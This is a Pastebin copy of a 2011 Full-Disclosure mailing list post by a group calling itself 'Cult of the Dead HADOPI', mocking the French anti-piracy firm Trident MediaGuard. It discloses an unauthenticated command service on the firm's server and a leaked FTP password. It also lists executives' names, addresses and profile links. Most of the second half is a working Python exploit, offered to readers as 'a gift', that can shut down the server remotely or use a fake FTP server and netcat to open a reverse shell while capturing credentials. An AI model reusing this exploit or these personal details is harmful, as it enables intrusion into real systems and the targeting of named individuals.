Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # Received: by 10.229.245.65 with HTTP; Fri, 20 May 2011 11:59:38 -0700 (PDT)
- # Date: Fri, 20 May 2011 20:59:38 +0200
- # Message-ID: <BANLkTi=gXd7qCEGpnjvfOM-_xJRh3TAfwQ AT mail.gmail.com>
- # From: "cult.of.the.dead.hadopi.tmg cult.of.the.dead.hadopi.tmg"
- # <cult.of.the.dead.hadopi.tmg AT gmail.com>
- # To: full-disclosure AT lists.grok.org.uk
- # X-Mailman-Approved-At: Fri, 20 May 2011 20:13:30 +0100
- # Subject: [Full-disclosure] Too Many Gremlins for Trident MediaGuard (HADOPI)
- # Content-Type: text/plain; charset="iso-8859-1"
- # Content-Transfer-Encoding: quoted-printable
- # From: cult.of.the.dead.hadopi.tmg <cult.of.the.dead.hadopi.tmg AT gmail.com>
- # To: full-disclosure AT lists.grok.org.uk
- # Date: 05/20/2011 08:59 PM
- # Subject: [Full-disclosure] Too Many Gremlins for Trident MediaGuard (HADOPI)
- Click "RAW" to remove formatting: http://pastebin.com/raw.php?i=br0BzhJG
- # -- TOP SECRET -- TOP SECRET -- TOP SECRET -- TOP SECRET -- TOP SECRET --
- # --==[ CULT OF THE DEAD HADOPI ]==--
- # Advisory 2
- # The HADOPI law or Creation and Internet law (French: Loi favorisant la
- # diffusion et la protection de la création sur Internet, "law
- # promoting the distribution and protection of creative works on the
- # internet") is a French law introduced during 2009, attempting to
- # control and regulate internet access as a means to encourage
- # compliance with copyright laws. "HADOPI" is the government agency
- # created by the eponymous law.
- # http://en.wikipedia.org/wiki/HADOPI_law
- # In a previous advisory, we exposed the secret plan of the French
- # government to take over the Internet using a patriotic botnet. A few
- # days after the strategy was exposed, the piece of software was removed
- # by Orange. No more Internet by Orange...
- # Now, the cult of the dead HADOPI is proud to announce his new advisory
- # (free copy, quote it as much as you want, no tax to be paid):
- # Too Many Gremlins
- # for
- # Trident MediaGuard
- # After such a big failure at creating a patriotic botnet, the French
- # government is trying to build a new army with strong and reliable
- # soldiers: Gremlins.
- # They subcontracted with a private company called Trident MediaGuard.
- # This company is as concealed as Bin Laden in the middle of the
- # Pakistan. It is the long arm of the HADOPI and the French government
- # for everything related to 3 strikes laws. Note that they recruit
- # people all over Europe at least. Fear the Gremlins.
- # But they fucked everything up as DSK.
- # Who are they?
- # Trident Media Guard (TMG) is a French company specialized in software
- # to prevent unauthorized copying of files over the Internet. Founded in
- # 2002 by Alain Guislain and Bastien Casalta, it is located in
- # Saint-Sébastien-sur-Loire near Nantes.
- # It aims to "provide services to major publishing companies of the
- # recording and film industry to stop the loss of revenue due to illegal
- # downloads on peer-to-peer networks."
- # http://en.wikipedia.org/wiki/Trident_Media_Guard
- # http://www.societe.com/societe/trident-media-guar-sa-441392586.html
- # You have to read to the end to learn how to pwn the Gremlins!
- # Never expose the Mogwai to bright lights *****************
- # During a few days around the 14th-15th of may 2011, a "test server"
- # (according to Too Many Gremlins spokeman) was exposed on the Internet.
- # It was supposed to be used for R&D only.
- # This server (91.189.104.82) gave some files revealing what Too Many
- # Gremlins is filtering, and how they are working.
- # You can retrieve all the files here: http://pastebin.com/Rc1zGXu0
- # They should remember it is better to close the door before going into
- # the bathroom. You never know, a maid could come in.
- # Never trust 91.189.104.0 - 91.189.111.255 -------------------------------
- # When you look for information about 91.189.104.82, you discover it belongs to:
- # $ whois 91.189.104.82
- # Inetnum: 91.189.104.0 - 91.189.111.255
- # netname: FARM04
- # descr: Trident Mediguard
- # country: FR
- # org: ORG-TA253-RIPE
- # admin-c: CB1756-RIPE
- # tech-c: CB1756-RIPE
- # person: Casalta Bastien
- # address: Trident Mediguard
- # 13 rue de la Tour d'Auvergne
- # 44200 Nantes
- # FR
- # phone: +33 2 40 12 00 97
- # fax-no: +33 2 40 35 36 79
- # e-mail: casalta@mediaguard.info
- # nic-hdl: CB1756-RIPE
- # route: 91.189.104.0/21
- # descr: Trident Mediguard
- # origin: AS174
- # mnt-by: COGENT-ROUTE-MNT
- # Gremlins, especially French ones, are horny and tend to reproduce very
- # quickly. They need at least a /21!
- # So, if you don't want gremlins to get you, just ban these IPs. Hmmm
- # maybe they noticed people already do that. So maybe now they are using
- # the same tricks every one does to bypass the 3 strikes law: using a
- # VPN
- # On a side note, quite funny:
- # $ host mediaguard.info
- # mediaguard.info has address 212.53.95.124
- # mediaguard.info mail is handled by 10 smtp99.nagra.com.
- # WTF is mediaguard doing with Nagra!
- # Back to the future -------------------------------
- # Gremlins can look so nice, so sweat, so kind especially when they
- # promise to government: Sir, yes Sir, all privacy will be kept
- # secret. We care about privacy, security, we really do, as long as you
- # pay us.
- # But of course, leaks happen, like in 2007 with Media Defender (just
- # google for "mediadefender email leak")
- # Then, you could find emails from Bastien Casalta, asking Media
- # Defender not to block some IP ranges:
- # From: Bastien Casalta
- # To: Ben Grodsky
- # Sent: Thu Aug 30 01:01:56 2007
- # Subject: IP Blocks
- # Hello Ben,
- # - you can ignore the following ip blocks:
- # 82.138.81.0 /24
- # 82.138.88.0 /22
- # 91.189.104.0 /21
- # 130.117.41.0 /24
- # 130.117.115.128 /25
- # Best,
- # Bastien
- # TMG
- # 13, rue de la Loire - Bât D
- # 44230 St Sébastien Sur Loire
- # Tel 02 40 12 00 97
- # Fax 02 40 35 36 79
- # contact_at_tmg.eu
- # It seems the range where the leak of the so called test server
- # 91.189.104.82 happens already belong to the Gremlins in 2007. Maybe
- # you also want to ban these ranges too.
- # BTW, you want to get in touch with Bastien Casalta, use the proper
- # email: casalta(at)tmg.eu
- # Gimme money ------------------------------
- # French politics can be very perv (yes, DSK is not the only one). They
- # succeed in taking taxes from people and give it to innovative
- # company. In 2005, Too Many Gremlins get 40.000 Euro from an official
- # agency supposed to help "innovative companies".
- # You see, all French are perverse: they pay taxes to get big brothered.
- # http://www.reseau-entreprendre-atlantique.fr/reseau-entreprendre-atlantique/fr/s04_laureats/s04p03_fiche_laureat.php?laureat=1897
- # Patents ------------------------------
- # The gremlins are very possessive. As such, they try to protect their
- # "precious". And nowadays, you don't have to hide for centuries in a
- # cave: you patent your idea!
- # * http://www.faqs.org/patents/app/20090210492
- # Patent application title: METHOD FOR COMBATTING THE ILLICIT
- # DISTRIBUTION OF PROTECTED MATERIAL AND COMPUTER SYSTEM FOR CARRYING
- # OUT SAID METHOD
- # Inventors: Alain Guislain (St. Sebastien Sur Loire, FR) Bastien
- # Casalta (Nantes, FR) Soufiane Rouibia (Nantes, FR)
- # IPC8 Class: AG06F1516FI
- # USPC Class: 709204
- # Publication date: 08/20/2009
- # Patent application number: 20090210492
- # Abstract:
- # The invention relates to a method for hindering or preventing the
- # illegal distribution of protected data in a peer-to-peer network
- # comprising at least one peer operating an exchange programme
- # designed for distribution of data to at least one client according
- # to a selective exchange protocol permitting the peer to operate a
- # selection of clients to which the data is transferred, said
- # selection being carried out as a function of one or more
- # characteristics of the clients. In said method bogus data is sent
- # to the peer such as to influence the selection of clients served
- # by the peer, such that the peer is made to favour the transfer to
- # authorised clients.
- # * http://www.faqs.org/patents/app/20100036935
- # Patent application title: METHOD FOR REACTING TO THE BROADCAST OF A
- # FILE IN A P2P NETWORK
- # Inventors: Bastien Casalta (Nantes, FR) Soufiane Rouibia (Nantes, FR)
- # IPC8 Class: AG06F1516FI
- # USPC Class: 709219
- # Publication date: 02/11/2010
- # Patent application number: 20100036935
- # Abstract:
- # A method for establishing connections with a number of peers of a
- # peer to peer network operating using at least one exchange
- # protocol, such as to influence the broadcast of a file within a
- # peer to peer network, the addresses of the number of peers being
- # held by at least one network server. A connection is established
- # with the network server such as to at least partially download the
- # addresses of the number of peers connected to the network and
- # implicated in the downloading of the file, to a control server,
- # then connections are established between at least one control
- # client exchanging data with the control server and peers the
- # addresses of which have been downloaded to the control server,
- # such as to download content from a peer to a controlled client or
- # broadcast content from a controlled client to a peer, the
- # downloading or broadcasting being carried out according to the
- # exchange protocol.
- # How to contact them -----------------------------
- # If you want to get in touch with the Gremlins leaders:
- # * Alain Guislain, CEO
- # http://fr.linkedin.com/pub/alain-guislain/1/215/952
- # * Bastien Casalta, CTO
- # http://www.linkedin.com/profile/view?id=4004355
- # * Soufiane Rouibia, R&D manager
- # http://fr.linkedin.com/pub/soufiane-rouibia/5/684/5b8
- # Or visit the empty website: http://tmg.eu
- # Never get it wet *****************
- # Ok, ok, it was a bit long. But you have to learn what Gremlins are to
- # understand this evil power. Let us have a look now at what was on that
- # server.
- # A list of names --------------------------------
- # In the server_interface.exe, the Gremlins are spreading. You can find
- # a list of ... we don't know what yet. You can easily find it everywhere
- # on the Internet now. Just look for KingElvis, jay@yahoo.se and
- # melon_foli, you will find the list.
- THE LIST: http://pastebin.com/xBFzK9Ce
- # Here, we are very disappointed: we can not determine what is this list
- # for :(
- # Are these the names of the Gremlins? Or nicks of the humans they ate?
- # No way to know.
- # Save your FTP password on the server itself ------------------------
- # No need to comment here...
- # 91.189.104.82/test/script>> cat cmd_auto_update_cmd_file.txt
- # share
- # hFd38+1E
- # prompt
- # pasv
- # mget "script/script_diff2/execute_update.bat"
- # mget "script/script_diff2/cmd_execute_update_cmd_file.txt"
- # Oh yes!
- # Just in case they erase the above file, it is also in
- # cmd_update_cmd_file.txt.
- # Remember, the Gremlins are supposed to protect your private data.
- # Never feed it after midnight *****************
- # Too Many Gremlins is an innovative company. Let us see how innovative
- # is the way the develop, and as such the way they protect the private
- # data they gather.
- # Among files they shared, one is called server_interface.exe. It is a
- # Delphi service (welcome in the 90s) listening on TCP/8500.
- # Advanced features: authentication -----------------------------
- # As they keep stating, Too Many Gremlins are on the edge of the
- # technology. The patents show how true it is. Sadly, we could not find
- # their patent on authentication ... maybe because you do not need to
- # authenticate!
- # Anyone can connect to this server and send commands. :)
- # This is called sharing, isn't-it ?
- # Advanced feature: protocol design ----------------------------
- # The protocol is very simple:
- # - first four bytes must be \x15\x66\x00\x78
- # - the next byte determines the command:
- # - \x65: shutdown the computer
- # - \x66: reboot the computer
- # - \x70: execute stop_P2P_client.bat
- # - two next bytes are used as size to get the output of this script
- # - \x71: execute start_P2P_client.bat
- # - two next bytes are used as size to get the output of this script
- # - \x81: execute transfer_set.bat
- # - next double word is the IP address to download files using FTP
- # - next word is the port to use
- # - two next bytes are used as size to get the output of this script
- # - \x82: execute auto_update.bat
- # - next double word is the IP address to download files using FTP
- # - next word is the port to use
- # - two next bytes are used as size to get the output of this script
- # As an exercise, you can code the proper Scapy classes. Please, drop
- # your submissions to http://trac.secdev.org/scapy
- # Advanced features: pwn the Gremlins --------------------------
- # Let us have a look at auto_update.bat used by command \x82:
- # 91.189.104.82/test/script>> cat auto_update.bat
- # @echo off
- # echo auto_update.bat
- # echo Transfering files from %1:%2, exiting in 10 sec
- # if (%1 == "") exit
- # echo Update cmd file
- # ftp -s:"C:\script\cmd_auto_update_cmd_file.txt" %1
- # execute_update.bat %1 %2
- # echo auto_update.bat completed
- # I think you have spot the problem :) An attacker can use the "Auto
- # Update" feature (\x82) to force the server to download updates from an
- # evil FTP server he controls. Of course, a downloaded file is executed
- # just after the download...
- # Hence, anyone who wants to raise an army against Too Many Gremlins,
- # look for open bar on TCP 8500. Here is the gift to you from the cult
- # of the dead HADOPI.
- # CLICK THE "RAW" TO COPY THE CODE - http://pastebin.com/raw.php?i=br0BzhJG
- # <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
- # $> cat Too_Many_Greemlins_exposed_to_the_sunlight.py
- #!/usr/bin/env python2
- # -*- coding: utf-8 -*-
- import sys
- import struct
- import time
- import socket
- from threading import Thread
- #
- # Change this IP to your public IP address.
- #
- PUBLIC_IP = "192.168.0.1"
- #
- # Don't forget to open ports 21 and 8501 in your
- # OpenOffice.org firewall
- #
- SRV_PORT = 8500
- FTP_PORT = 21
- SHELL_PORT = 8501
- MAGIC = "\x15\x66\x00\x78"
- HALT = "\x65"
- REBOOT = "\x66"
- STOP = "\x70\x00\x00"
- UPDATE = "\x82"
- OK = "\x01"
- def usage (msg = None):
- if msg: print "Error: %s\n" % msg
- print "Usage: %s IP command" % sys.argv[0]
- print
- print "commands:"
- print "- halt shutdown the server"
- print "- reboot reboot the server"
- print "- stop stop P2P clients (eMule and Shareaza)"
- print "- pwn use a vulnerability in the Auto Update feature to get a remote shell"
- sys.exit(0)
- class fake_ftpd(Thread):
- def __init__ (self):
- Thread.__init__(self)
- self.s = None
- f = open('./nc.exe', 'rb')
- nc = f.read()
- f.close()
- batch = "@echo off\r\n"
- batch += "move cmd_execute_update_cmd_file.txt nc.exe\r\n"
- batch += "nc.exe %s %s -e cmd.exe\r\n" % (PUBLIC_IP, SHELL_PORT)
- self.files = {
- 'script/script_diff2/execute_update.bat': batch,
- 'script/script_diff2/cmd_execute_update_cmd_file.txt': nc
- }
- def run (self):
- self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- self.s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
- self.s.bind(("", FTP_PORT))
- self.s.listen(1)
- self.s.listen(0x1337)
- print "[+] Waiting for FTP connection..."
- conn, addr = self.s.accept()
- print "[!] FTP - %s connected!" % addr[0]
- conn.send("220 Welcome to my FTPd - Ready to pwn you!\r\n")
- while True:
- data = conn.recv(1024)
- if not data:
- break
- args = data.rstrip().split(' ')
- if data.startswith('CWD'):
- conn.send('250 CWD command successful.\r\n')
- elif data.startswith('TYPE'):
- conn.send('200 TYPE set.\r\n')
- elif data.startswith('USER'):
- conn.send('331 Password required.\r\n')
- username = data.split(' ')[1].rstrip()
- elif data.startswith('PASS'):
- conn.send('230 User logged in.\r\n')
- password = data.split(' ')[1].rstrip()
- print "[!] TMG credentials: %s/%s" % (username, password)
- elif data.startswith('PORT'):
- arg = args[1].split(',')
- ip = '.'.join(arg[:4])
- port = int(arg[4]) * 256 + int(arg[5])
- sdata = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- sdata.connect((ip, port))
- conn.send('200 PORT command successful.\r\n')
- elif data.startswith('RETR'):
- conn.send('150 Opening BINARY mode data connection\r\n')
- buf = self.files.get(args[1], 'file not found\r\n')
- sdata.send(buf)
- sdata.close()
- conn.send('226 Transfer complete\r\n')
- print "[+] File \"%s\" transfered..." % args[1]
- elif data.startswith('NLST'):
- conn.send('150 Here comes the directory listing.\r\n')
- if len(args) == 1:
- listing = ''
- else:
- listing = args[1]
- sdata.send(listing + '\r\n')
- sdata.close()
- conn.send('226 Directory send OK.\r\n')
- elif data.startswith('QUIT'):
- conn.send('221 Goodbye.\r\n')
- break
- else:
- conn.send('500 Unknown command.\r\n')
- conn.close()
- def do_stuff (host, cmd):
- s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- s.settimeout(5)
- try:
- print "[+] Connecting to %s:%d..." % (host, SRV_PORT)
- s.connect((host, SRV_PORT))
- except Exception, e:
- print("[?] Error: %s" % e)
- s.close()
- return ;
- print "[+] Sending evil packet..."
- if cmd == 'halt':
- s.send(MAGIC + HALT)
- print "[!] Done!"
- elif cmd == 'reboot':
- s.send(MAGIC + REBOOT)
- print "[!] Done!"
- elif cmd == 'stop':
- s.send(MAGIC + STOP)
- data = s.recv(1)
- if data and data[0] == OK:
- print "[!] Done!"
- else:
- print "[!] Error :("
- elif cmd == 'pwn':
- ftpd = fake_ftpd()
- ftpd.daemon = True
- ftpd.start()
- command = socket.inet_aton(PUBLIC_IP) + struct.pack("h", socket.ntohs(FTP_PORT)) + "\x00\x00"
- s.send(MAGIC + UPDATE + command)
- data = s.recv(1)
- if data and data[0] == OK:
- s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- s2.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
- s2.bind(("", SHELL_PORT))
- s2.listen(1)
- conn, addr = s2.accept()
- print "[!] SHELL - %s connected!" % addr[0]
- print conn.recv(4096)
- while True:
- cmd = raw_input()
- if cmd == "quit" or cmd == "exit":
- break;
- conn.send(cmd + "\r\n")
- data = ""
- conn.settimeout(None)
- data = conn.recv(1024)
- conn.settimeout(1)
- while True:
- line = ""
- try:
- line = conn.recv(1024)
- except socket.timeout:
- break
- if line == "":
- break
- data += line
- tab = data.split("\n")
- print "\n".join(tab[1:-1])
- conn.close()
- else:
- print "[!] Error :("
- s.close()
- if __name__ == '__main__':
- if len(sys.argv) < 3:
- usage("Not enough arguments")
- (_, host, cmd) = sys.argv
- if cmd not in ['halt', 'reboot', 'stop', 'pwn']:
- usage('Invalid command ("%s")' % cmd)
- do_stuff(host, cmd)
- sys.exit(0)
- # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
- # Famous last words *****************
- # Whether or not this was test server, it does not matter. It just show
- # how reliable Too Many Gremlins can be.
- # The piece of software is as good as Orange's one described in our
- # previous advisory. Even a kid could pwn them. Scary.
- # French evil master plan agency HADOPI stated they are going to inspect
- # Too Many Gremlins in order to assess if they are secure now. I hope
- # they also had a look to their codes. Oh no! They can not. Reverse
- # engineering is mostly illegal in France. So we should just trust the
- # Gremlins.
- # Greets ******
- # N. Sarkozy, Chinese fellows, C. Albanel, F. Mitterrand J-L. Warsmann,
- # F. Riester, F. Lefebvre, J-L. Masson, J. Myard, M. Thiollière,
- # M. Marland-Militello
- # -- TOP SECRET -- TOP SECRET -- TOP SECRET -- TOP SECRET -- TOP SECRET
- # _______________________________________________
- # Full-Disclosure - We believe in it.
- # Hosted and sponsored by Secunia - http://secunia.com/
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement